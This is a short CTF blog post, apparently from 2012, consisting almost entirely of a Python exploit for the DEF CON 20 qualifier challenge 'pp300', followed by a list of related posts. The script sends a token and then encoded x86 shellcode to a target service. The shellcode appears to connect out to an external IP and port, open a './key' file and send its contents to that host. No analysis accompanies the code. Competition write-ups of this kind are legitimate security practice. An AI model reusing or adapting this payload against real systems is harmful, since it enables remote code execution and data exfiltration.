defcon20 pp300 exploit
2012. 6. 16. 14:10
#!/usr/bin/python2.6
#defcon 2012, pp300 exploit - badcob
import socket, sys
from struct import pack
def make_connection(host,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
return s
def make_payload(scode):
#padding 1 byte : shellcode length 79byte
scode += "\x90"
#move byte ptr ss:[ebp+x], shellcode 1 byte
mov_byte_ptr = "\xc6\x45"
tmp = ''
count = 0
for x in scode:
tmp += mov_byte_ptr + chr(count) + x
count += 0x1
#call ebp
call_ebp = "\xff\xd5\x90\xff"
return tmp + call_ebp
#shellcode
scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"
host = "192.168.74.134"
port = 7548
num = "3c56bc31268ac65f" + "\x0a"
#make payload
payload = make_payload(scode)
s = make_connection(host,port)
s.send(num)
s.send(payload)
'CTF' 카테고리의 다른 글
| Holyshield 2010 Write up (2) | 2012.11.28 |
|---|---|
| JFF2 JH1 (2) | 2012.08.11 |
| jff2 silly100 (5) | 2012.08.06 |
| defcon20 bin200 (0) | 2012.06.22 |
| defcon20 pp400 exploit (0) | 2012.06.16 |
| defcon20 pp200 exploit (0) | 2012.06.16 |
| pctf 2012 format (0) | 2012.05.09 |
| Defcon 19 b500 writeup (0) | 2011.06.17 |
| ISEC 2010 level8 random array (0) | 2010.11.10 |